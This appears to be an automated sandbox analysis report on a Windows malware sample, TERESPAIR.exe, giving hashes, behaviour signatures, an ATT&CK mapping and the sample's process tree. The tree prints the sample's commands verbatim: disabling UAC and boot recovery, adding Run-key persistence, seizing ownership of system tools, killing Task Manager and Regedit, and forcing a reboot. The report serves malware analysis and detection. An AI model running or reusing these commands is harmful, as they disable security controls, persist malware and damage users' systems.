Analysis
-
max time kernel
5s -
max time network
8s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
01-07-2024 02:21
Static task
static1
Behavioral task
behavioral1
Sample
TERESPAIR.exe
Resource
win11-20240508-en
General
-
Target
TERESPAIR.exe
-
Size
551KB
-
MD5
0ffccbd12475d9082cf307ad70739bdc
-
SHA1
3357a844ae038543844e622839167e7ff1360474
-
SHA256
4c291a0e441b43a6d0bb77f5038ca736276e735196349abb6e9d4c7cc3fd4dc5
-
SHA512
7d8893b8082faf6dee334959f602c5e81192982238ce5dfd52210f7db48c73fe5ad952860f845404b7c369e3be11d3c6bc0cab2cacab993632211a5e599559ee
-
SSDEEP
12288:Scv0NTIx0stUF2jL2DBzvksvkyRQ72KGNxJLACRC/q9:ScvkTIxxUFT9TvkG7lJsCUy9
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
-
Possible privilege escalation attempt 12 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 4028 takeown.exe 720 icacls.exe 2988 takeown.exe 3236 icacls.exe 2628 takeown.exe 1180 icacls.exe 2168 takeown.exe 1120 icacls.exe 2240 takeown.exe 2092 icacls.exe 2408 takeown.exe 4716 icacls.exe -
Modifies file permissions 1 TTPs 12 IoCs
Processes:
icacls.exetakeown.exeicacls.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 4716 icacls.exe 2240 takeown.exe 2092 icacls.exe 3236 icacls.exe 2628 takeown.exe 1180 icacls.exe 2408 takeown.exe 2988 takeown.exe 2168 takeown.exe 1120 icacls.exe 4028 takeown.exe 720 icacls.exe -
Modifies system executable filetype association 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico" reg.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Software\Microsoft\Windows\CurrentVersion\Run\death.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\death.exe" reg.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 10 IoCs
Processes:
cmd.exedescription ioc process File created C:\Windows\System32\mmc.exe cmd.exe File opened for modification C:\Windows\System32\mmc.exe cmd.exe File created C:\Windows\System32\UserAccountControlSettings.exe cmd.exe File created C:\Windows\System32\chkdsk.exe cmd.exe File opened for modification C:\Windows\System32\chkdsk.exe cmd.exe File opened for modification C:\Windows\System32\taskmgr.exe cmd.exe File created C:\Windows\System32\taskkill.exe cmd.exe File opened for modification C:\Windows\System32\taskkill.exe cmd.exe File opened for modification C:\Windows\System32\UserAccountControlSettings.exe cmd.exe File created C:\Windows\System32\taskmgr.exe cmd.exe -
Drops file in Windows directory 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Windows\regedit.exe cmd.exe File opened for modification C:\Windows\regedit.exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 4632 taskkill.exe 3456 taskkill.exe 2484 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "24" LogonUI.exe -
Modifies registry class 5 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5767.tmp\\SKULL.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exeshutdown.exedescription pid process Token: SeDebugPrivilege 3456 taskkill.exe Token: SeDebugPrivilege 2484 taskkill.exe Token: SeDebugPrivilege 4632 taskkill.exe Token: SeTakeOwnershipPrivilege 2168 takeown.exe Token: SeTakeOwnershipPrivilege 4028 takeown.exe Token: SeTakeOwnershipPrivilege 2988 takeown.exe Token: SeTakeOwnershipPrivilege 2628 takeown.exe Token: SeTakeOwnershipPrivilege 2408 takeown.exe Token: SeTakeOwnershipPrivilege 2240 takeown.exe Token: SeShutdownPrivilege 2352 shutdown.exe Token: SeRemoteShutdownPrivilege 2352 shutdown.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
LogonUI.exepid process 2884 LogonUI.exe -
Suspicious use of WriteProcessMemory 56 IoCs
Processes:
TERESPAIR.execmd.exedescription pid process target process PID 4364 wrote to memory of 1576 4364 TERESPAIR.exe cmd.exe PID 4364 wrote to memory of 1576 4364 TERESPAIR.exe cmd.exe PID 1576 wrote to memory of 2252 1576 cmd.exe bcdedit.exe PID 1576 wrote to memory of 2252 1576 cmd.exe bcdedit.exe PID 1576 wrote to memory of 2116 1576 cmd.exe reg.exe PID 1576 wrote to memory of 2116 1576 cmd.exe reg.exe PID 1576 wrote to memory of 2740 1576 cmd.exe reg.exe PID 1576 wrote to memory of 2740 1576 cmd.exe reg.exe PID 1576 wrote to memory of 4804 1576 cmd.exe reg.exe PID 1576 wrote to memory of 4804 1576 cmd.exe reg.exe PID 1576 wrote to memory of 3872 1576 cmd.exe reg.exe PID 1576 wrote to memory of 3872 1576 cmd.exe reg.exe PID 1576 wrote to memory of 2140 1576 cmd.exe reg.exe PID 1576 wrote to memory of 2140 1576 cmd.exe reg.exe PID 1576 wrote to memory of 3408 1576 cmd.exe reg.exe PID 1576 wrote to memory of 3408 1576 cmd.exe reg.exe PID 1576 wrote to memory of 4780 1576 cmd.exe reg.exe PID 1576 wrote to memory of 4780 1576 cmd.exe reg.exe PID 1576 wrote to memory of 1900 1576 cmd.exe reg.exe PID 1576 wrote to memory of 1900 1576 cmd.exe reg.exe PID 1576 wrote to memory of 1864 1576 cmd.exe reg.exe PID 1576 wrote to memory of 1864 1576 cmd.exe reg.exe PID 1576 wrote to memory of 4904 1576 cmd.exe reg.exe PID 1576 wrote to memory of 4904 1576 cmd.exe reg.exe PID 1576 wrote to memory of 3456 1576 cmd.exe taskkill.exe PID 1576 wrote to memory of 3456 1576 cmd.exe taskkill.exe PID 1576 wrote to memory of 2484 1576 cmd.exe taskkill.exe PID 1576 wrote to memory of 2484 1576 cmd.exe taskkill.exe PID 1576 wrote to memory of 4632 1576 cmd.exe taskkill.exe PID 1576 wrote to memory of 4632 1576 cmd.exe taskkill.exe PID 1576 wrote to memory of 2168 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 2168 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 1120 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 1120 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 4028 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 4028 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 720 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 720 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 2988 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 2988 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 3236 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 3236 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 2628 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 2628 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 1180 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 1180 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 2408 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 2408 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 4716 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 4716 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 2240 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 2240 1576 cmd.exe takeown.exe PID 1576 wrote to memory of 2092 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 2092 1576 cmd.exe icacls.exe PID 1576 wrote to memory of 2352 1576 cmd.exe shutdown.exe PID 1576 wrote to memory of 2352 1576 cmd.exe shutdown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe"C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5767.tmp\5768.tmp\5769.bat C:\Users\Admin\AppData\Local\Temp\TERESPAIR.exe"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Arrow /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Hand /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v AppStarting /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Cursors" /v Wait /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\cursor.cur" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /ve /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\SKULL.ico" /f3⤵
- Modifies system executable filetype association
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /ve /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\SKULL.ico" /f3⤵
- Modifies registry class
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v death.exe /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\death.exe" /f3⤵
- Adds Run key to start application
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\5767.tmp\bg.jpg" /f3⤵
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im regedit.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im mmc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\regedit.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\regedit.exe" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\taskmgr.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\taskmgr.exe" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\taskkill.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\taskkill.exe" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\mmc.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\mmc.exe" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\UserAccountControlSettings.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\UserAccountControlSettings.exe" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32\chkdsk.exe"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\System32\chkdsk.exe" /grant everyone:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\shutdown.exeshutdown /r /t 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Event Triggered Execution
1Change Default File Association
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Event Triggered Execution
1Change Default File Association
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\5767.tmp\5768.tmp\5769.batFilesize
2KB
MD58894013652db082fb9a4ce91bf40222f
SHA1d79e5f5f4984ea0f2648b6155feecf3d786767e5
SHA256c3914537fd001edc8d9d9d6497cbd942de5b478d391a00ca07f86af017c62359
SHA51294c3587a6d141d8e1b7f3e1b49173e65b1c51f327f5e676ee7a072384ee0fec0ed4f56a67704dbf7ad254aa16ba75490da018a9591cb5326deb317a21ae604f9
-
C:\Users\Admin\AppData\Local\Temp\5767.tmp\popups.exeFilesize
87KB
MD5d7f63114aade341d8a3f6924cdfa182a
SHA1ebf02b5fc29dde742321f2bc5bf80575907d7daf
SHA2561e6d2f793b52c9099dea1c94bb97e1e4e10683ef588cf090a82781c67779ebeb
SHA512763d369c0002b64436f74b89ffd1879f9390445713634b73e3fd3fe40ba57373efa86d0c102d79571b5f21f2ce972475517b716c7567b3fcb1fc225e94de51a5
-
C:\Users\Admin\Desktop\OPENME5.txtFilesize
71B
MD54207e6b2edf7d32f4ffa65b257b84598
SHA144b173829cb9a85997ebc1e9184080534404b5ff
SHA2564ded9a36558a18aaf67f9cddc11e60ad4f8f45230a50626fdb60de7ee1ff0f4c
SHA512c4deaeb10de42d997b6fda00ff2266ee41ebb9b901043a9e6f106b166d6a2559acb9329a4ff4b611c4c6bf08662dd2461248118f5076ade34357f18973213954